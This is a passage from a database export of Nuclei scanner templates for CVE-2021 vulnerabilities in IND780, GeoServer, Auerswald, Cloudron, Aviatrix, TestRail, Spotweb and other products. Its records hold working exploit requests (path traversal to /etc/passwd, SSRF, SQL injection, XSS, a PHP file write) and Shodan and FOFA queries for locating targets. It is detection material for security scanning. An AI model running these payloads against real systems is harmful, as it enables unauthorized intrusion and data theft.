"CVE-2021-40661.yaml", "content": "id: CVE-2021-40661\n\ninfo:\n name: IND780 - Local File Inclusion\n author: For3stCo1d\n severity: high\n description: |\n IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks.\n reference:\n - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661\n - https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40661\n - https://github.com/Live-Hack-CVE/CVE-2021-40661\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40661\n cwe-id: CWE-22\n epss-score: 0.01137\n epss-percentile: 0.84411\n cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: mt\n product: ind780_firmware\n shodan-query: IND780\n google-query: inurl:excalweb.dll\n tags: cve2021,cve,ind780,lfi,mt\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ExePath=\\Windows'\n - 'WorkDir=\\Windows'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b7e2b1761ea31f96096ee954d371b91df663bcfa45c8f773a58b8f5f509c9e11022100a7cd7929229cc6298d1bd75e2f8a31d62e513dfae2e7c5fc750a14a9a971e44c:922c64590222798bb761d5b6d8e72950", "hash": "9b827bb104030bf2b0eee807e75acbad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ae" }, "name": "CVE-2021-40822.yaml", "content": "id: CVE-2021-40822\n\ninfo:\n name: Geoserver - Server-Side Request Forgery\n author: For3stCo1d,aringo-bf\n severity: high\n description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: |\n Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability.\n reference:\n - https://gccybermonks.com/posts/cve-2021-40822/\n - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3\n - https://github.com/geoserver/geoserver/releases\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40822\n - https://osgeo-org.atlassian.net/browse/GEOS-10229\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40822\n cwe-id: CWE-918\n epss-score: 0.68366\n epss-percentile: 0.97892\n cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: osgeo\n product: geoserver\n shodan-query: title:\"GeoServer\"\n fofa-query: app=\"GeoServer\"\n tags: cve2021,cve,ssrf,geoserver,osgeo\n\nhttp:\n - raw:\n - |\n POST /geoserver/TestWfsPost HTTP/1.1\n Host: oast.pro\n Content-Type: application/x-www-form-urlencoded\n\n form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210097677b11bc4965e4caadab5f77264e9a0e4a19a059a4c5e5269a6aff5c98b76e022015b1d85cb9b06c62a60bfe3cf6f89fb25cc22fb593d23eb92e858bc117b5b1a0:922c64590222798bb761d5b6d8e72950", "hash": "69550365737482bf98a83b11007ca212", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083af" }, "name": "CVE-2021-40856.yaml", "content": "id: CVE-2021-40856\n\ninfo:\n name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass\n author: gy741\n severity: high\n description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix \"/about/../\" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the device.\n remediation: |\n Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40856\n - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass\n - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses\n - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40856\n cwe-id: CWE-706\n epss-score: 0.19673\n epss-percentile: 0.96195\n cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: auerswald\n product: comfortel_3600_ip_firmware\n tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald\n\nhttp:\n - raw:\n - |\n GET /about/../tree?action=get HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"TYPE\"'\n - '\"ITEMS\"'\n - '\"COUNT\"'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022028bdba9d64a2d18b27dfebb790b671539f778631bd979ac1642a47088b5b2917022100b0e42914393ecfa44d74f6f6638170bb5062a2c97feaf4811f7b8290f7e1be46:922c64590222798bb761d5b6d8e72950", "hash": "4d6c540572fc6b13489e396947141afb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b0" }, "name": "CVE-2021-40859.yaml", "content": "id: CVE-2021-40859\n\ninfo:\n name: Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor\n author: pussycat0x\n severity: critical\n description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint (\"https://192.168.1[.]2/about_state\"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.\n impact: |\n Unauthenticated attackers can gain unauthorized access to affected devices.\n remediation: |\n Apply the latest firmware update provided by Auerswald to fix the backdoor vulnerability.\n reference:\n - https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40859\n - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses\n - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40859\n epss-score: 0.02655\n epss-percentile: 0.89305\n cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: auerswald\n product: compact_5500r_firmware\n fofa-query: '\"auerswald\"'\n tags: cve2021,cve,iot,unauth,voip,auerswald\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/about_state\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"pbx\"'\n - '\"dongleStatus\":0'\n - '\"macaddr\"'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207e9f03cfc22824f9b2ffecb480c87c419947367e3e1022181f8ff6eb96a4ec3d022033e425c150edf47cd52e2d6594313121ea1d7ab5e889217bad42b5f1ef22ac70:922c64590222798bb761d5b6d8e72950", "hash": "f7c1b3a1b41c3baf131f9c5f490adaac", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b1" }, "name": "CVE-2021-40868.yaml", "content": "id: CVE-2021-40868\n\ninfo:\n name: Cloudron 6.2 Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Upgrade to Cloudron 6.3 or higher.\n reference:\n - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40868\n - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html\n - https://www.cloudron.io/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40868\n cwe-id: CWE-79\n epss-score: 0.00379\n epss-percentile: 0.72411\n cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cloudron\n product: cloudron\n tags: cve2021,cve,xss,cloudron,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - ''\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201c3cd3fcfe337c0c3bf3f141e268c4cb3e002423d6e3548ff23bcbd491c3985f022100ea3bc691a51662cc8e63a76bfd75b8dd912d1a978fee1f84bb0fc26d13aff053:922c64590222798bb761d5b6d8e72950", "hash": "7611e0c5ad8662539f528ebb92949cd7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b2" }, "name": "CVE-2021-40870.yaml", "content": "id: CVE-2021-40870\n\ninfo:\n name: Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution\n author: pikpikcu\n severity: critical\n description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability.\n reference:\n - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021\n - https://wearetradecraft.com/advisories/tc-2021-0002/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40870\n - http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40870\n cwe-id: CWE-23\n epss-score: 0.85536\n epss-percentile: 0.98294\n cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: aviatrix\n product: controller\n tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload\n\nhttp:\n - raw:\n - |\n POST /v1/backend1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=\n - |\n GET /v1/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '0d95513363fd69b9fee712f333293654'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202b4ab0789330c0b1411a4a172a6b1f4b2d10ac3db69314c40b5a0b62e2d45e1f02206492a8c94b9f5acd0daacb9ee1023062b7d819ec1eb3a30a732a884009f3a527:922c64590222798bb761d5b6d8e72950", "hash": "8097969a0a7066ba438aad3fd166f23f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b3" }, "name": "CVE-2021-40875.yaml", "content": "id: CVE-2021-40875\n\ninfo:\n name: Gurock TestRail Application files.md5 Exposure\n author: oscarintherocks\n severity: high\n description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.\n impact: |\n An attacker could use the exposed files.md5 to gain insight into the application's file structure and potentially identify vulnerabilities or sensitive information.\n remediation: |\n Securely restrict access to the files.md5 file and ensure that it is not accessible to unauthorized users.\n reference:\n - htttps://github.com/SakuraSamuraii/derailed\n - https://johnjhacking.com/blog/cve-2021-40875/\n - https://www.gurock.com/testrail/tour/enterprise-edition\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875\n - https://github.com/SakuraSamuraii/derailed\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40875\n cwe-id: CWE-425\n epss-score: 0.25891\n epss-percentile: 0.96608\n cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: gurock\n product: testrail\n shodan-query: http.html:\"TestRail\"\n tags: cve2021,cve,exposure,gurock,testrail\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/files.md5\"\n - \"{{BaseURL}}/testrail/files.md5\"\n\n stop-at-first-match: true\n max-size: 1000 # Define response size in bytes to read from server.\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"app/arguments/admin\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207646eee4aa56e0329051709dffce67b5a0edf5f25c7eb190e70efc6d1b7b6f8c02202b08a5b0dd6adc756b48637e62ccc41bc5216d7b2207c2e52a2ff701a708d1e7:922c64590222798bb761d5b6d8e72950", "hash": "6f8fd165cb64438fafd01bd3307776e8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b4" }, "name": "CVE-2021-40908.yaml", "content": "id: CVE-2021-40908\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.\n reference:\n - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40908\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40908\n cwe-id: CWE-89\n epss-score: 0.0161\n epss-percentile: 0.8612\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project\n\nhttp:\n - raw:\n - |\n POST /classes/Login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"incorrect\\\"\")'\n condition: and\n# digest: 4a0a00473045022100e6f6b36eba8496c9a593169aab8d1c95a86ab766f8a7b6ff30f96d2d5d78e45b022054ee34ff5a00ffd01500719d1a15661146d35eb17a7224a0a24f38c5519de6bb:922c64590222798bb761d5b6d8e72950", "hash": "d9f999057e5dbb845321aa734acc3001", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b5" }, "name": "CVE-2021-40960.yaml", "content": "id: CVE-2021-40960\n\ninfo:\n name: Galera WebTemplate 1.0 Directory Traversal\n author: daffainfo\n severity: critical\n description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.\n impact: |\n An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.\n reference:\n - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960\n - http://www.galera.com.tr/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-40960\n cwe-id: CWE-22\n epss-score: 0.00946\n epss-percentile: 0.81464\n cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: galera\n product: galera_webtemplate\n tags: cve2021,cve,lfi,galera\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220187c8c2301f46d23bd67d918a519d449fe550a6f1a0f86fe94bc653a088fc06a022100ad5cb9e4d174b698f3ab2139e6a5208125620d52e6a8c126cd582398026d6652:922c64590222798bb761d5b6d8e72950", "hash": "6e060c42ca5e760f61f4bbcaf837a9de", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b6" }, "name": "CVE-2021-40968.yaml", "content": "id: CVE-2021-40968\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40968\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40968\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206dba6a431dc30930ad050e7f834b22acc257437f9ac33a3d996fcc702e3aa15802205f6714478f7cfa16218ab6510bd7d4dd9093ad29ce7722c5b0e8a4fee8aa45f6:922c64590222798bb761d5b6d8e72950", "hash": "b2fe278233e6405c5332514b0bef6885", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b7" }, "name": "CVE-2021-40969.yaml", "content": "id: CVE-2021-40969\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, data theft, or other attacks.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40969\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40969\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.51305\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[firstname]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207085af68079243c3f162206c08f5bfc2c11e35d92aa24107a9a989d42674176e022100c72473d3a42f86cc061bb8fec67780356ca1769c35fa52f444ff3316f6674779:922c64590222798bb761d5b6d8e72950", "hash": "33d7f944fa9a9797f250f79baa1a94c8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b8" }, "name": "CVE-2021-40970.yaml", "content": "id: CVE-2021-40970\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40970\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40970\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[username]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bacabdca74f9c9fbae5381ac0a8ef79f2c5702cb4c709e6194bfeb4213c503e902203c7a3b7376f619852ee754a987330645eee544784fe9acd88459eb72f7029e7f:922c64590222798bb761d5b6d8e72950", "hash": "48234b3242b0b9c2c01e6561336b48af", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083b9" }, "name": "CVE-2021-40971.yaml", "content": "id: CVE-2021-40971\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40971\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40971\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220018fbd142442b644347ff23fb7ff5fae090cbd6180d4bae07df55618e3576c9002204f369d1032ff131cbf6c6bd4b8e1394b6b238418b68862884580300adb61e42b:922c64590222798bb761d5b6d8e72950", "hash": "ed06013e561013fccbfc617f7fbddd36", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ba" }, "name": "CVE-2021-40972.yaml", "content": "id: CVE-2021-40972\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40972\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40972\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.50482\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve,cve2021,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[mail]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202757edffd7b33049b4800f2a103e17130c6a711e551b6c494103f56e468676c2022100f5e21ea7300875d7fc8fddbc5308c309b8637309b4b14ffa1e252ef9e82955e7:922c64590222798bb761d5b6d8e72950", "hash": "053ab55beee5996fdcb2b19f18863fa7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bb" }, "name": 